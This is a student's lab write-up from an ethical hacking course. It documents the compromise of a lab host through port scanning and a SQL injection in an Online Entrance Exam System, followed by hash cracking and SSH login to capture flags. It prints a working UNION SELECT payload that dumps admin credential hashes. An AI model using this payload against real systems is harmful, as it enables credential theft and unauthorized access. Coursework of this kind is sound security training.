> For the complete documentation index, see [llms.txt](https://paul-gleason.gitbook.io/sec-335-eth.-hacking-and-pen.-testing/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://paul-gleason.gitbook.io/sec-335-eth.-hacking-and-pen.-testing/labs/lab-9.1-exploit-gloin.md).

# Lab 9.1: Exploit Gloin

**Deliverable 1.  Provide the Following Information to include commands and screenshots.  Create a tech journal page that covers the following.**

* **Target IP Address**

<figure><img src="https://lh5.googleusercontent.com/cnfcKow3FMgfMwraUfGEVsxqWV8cw601RKNWtu32qGGz94Z0YbWx1ZGoioP5oCD1iKnP2aKz0Tc3I5yKkdpaWDujxGHg3pwK2DsMVEfgAXa1CW8ylr4J6Kf71vDuDD4IGxO1n-n5KECNlD5CdpQgAOI" alt=""><figcaption></figcaption></figure>

```
10.0.5.31
```

* **Open Ports**

<figure><img src="https://lh3.googleusercontent.com/6llAK67TrlElA3v5OkBWqJXvR-jCfwr3GOfnNVSdCMUx4bp-mXJ66irzGrWQbebn4BYX34r3e0HWGnnh0tP_Om5_EswSB6pQo46CdFRM7L-emVmvzva-mJZq1qu1VPayB6BjF07iUambhiZBhb6mImc" alt=""><figcaption></figcaption></figure>

```
22
443
3389
```

* **Discovered Vulnerability**

<figure><img src="https://lh4.googleusercontent.com/1tzg0fBiFQo7QEZ6yDtLJx1U7UFUuqpOR37I01nlEYBjxW6Cb3XogPOr3_TURKjFQAW_WLgMpLYYbI1_m3jC2zgoGcGkBBS3q0IfuTAeWtvU3XMERWjGJX2tZJudvNtRJWTbkVNwyvr9jbj2e3PpuZc" alt=""><figcaption></figcaption></figure>

Found that Online Entrance Exam System has an sql vulnerability

<figure><img src="https://lh6.googleusercontent.com/wUcxIl12Ivy5aXeLmIWL76EH8sCzvOiu9j4WPEiRhAi-rjhdq8NjYXjGaZElLLlQrjI3GE3orUNd6wERXggmIS4IW5bVAUggN0DTXaL-ZWfq-N9Kp3z_f5-stc0r9_2OvZtAkJZ3OfmZqbN8B3PLZLQ" alt=""><figcaption></figcaption></figure>

{% code overflow="wrap" %}

```
https://10.0.5.31/entrance_exam/take_exam.php?id=%27+UNION+SELECT+1,username||%27;%27||password,3,4,5,6,7+FROM+admin_list;

```

{% endcode %}

Line above will dump admin hash

<figure><img src="https://lh3.googleusercontent.com/NZrhlGjR8kwia0NF_f6KfdUvpXl3fHljoo_MinICMuiIHVni2vW3JVrtDYmKf0US7A1srpOZctjOOrIgQneUxEFYFJP_uDT1pC_6v9nWs5x3fnrjo9Y7RWTyZlHSmP9UAqZwivjU6mo6JTImy22-tCM" alt=""><figcaption></figcaption></figure>

Peer told me to use CrackStation for this step

<figure><img src="https://lh3.googleusercontent.com/l-AvNhWFWvbiyChcyrdMlIcsOAmmQHOkDRtE9nqgDOZHlYOwrOzs-4SqYh9kHPgK9A2THkdPxAC0RMIPxT986A-p1_oqzzFjg3D2EG9vcnG3eYva_L0i4pKSAKMKvYL026TOiWElw6b9mE5zNKLE9es" alt=""><figcaption></figcaption></figure>

* **How you achieved a foothold**

I found the exploit for Online Entrance Exam System by using searchsploit and finding a mysql exploit then looking at exploit db and reading what was there.

<figure><img src="/files/QjziRXTyPMP48ac2lKtG" alt=""><figcaption></figcaption></figure>

* **How you achieved root/Administrative level compromise**

I cracked the hash for the admin user and then sshed into the machine using administrator as the user because it’s a windows machine.

* **User Flag**

<figure><img src="https://lh4.googleusercontent.com/yHW8Uhw_6BuX3sc91M0MUMtuNpyuoDwQUdlPESuY31Bi5A4syD92HbzF5v48FEsyZ9MtdQOy-RJ2D1j_fasZgXbiV-OwZK2txUhlM9Fik9zRsWvaX3AN-oscMBGrdZIHoLTVVgVMppZxjWWMCWWALS4" alt=""><figcaption><p>User Flag</p></figcaption></figure>

* **Root Flag**

<figure><img src="https://lh5.googleusercontent.com/GVwxGxgCoViG1I76kR4q_VmMjNioFQl32O-ciki3_3x8PxI3gtyfAc8VyCRdLNZW9NGBMI0W8W81tZ8ksB2jB8H0ExJ6XKORcfm5-emUAtdZy5fvy-B4YAeicPQXrQbgPj39JgyNRdDGmDwe05Ckv7Y" alt=""><figcaption><p>Root Flag</p></figcaption></figure>

### Overview

I didn't have much trouble with this lab I was very thankful for my peer who told me to use CrackStation instead of trying to other tools. It made this process a lot easier. I did find it very fun to not have much information and having to get a foothold on our own.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://paul-gleason.gitbook.io/sec-335-eth.-hacking-and-pen.-testing/labs/lab-9.1-exploit-gloin.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
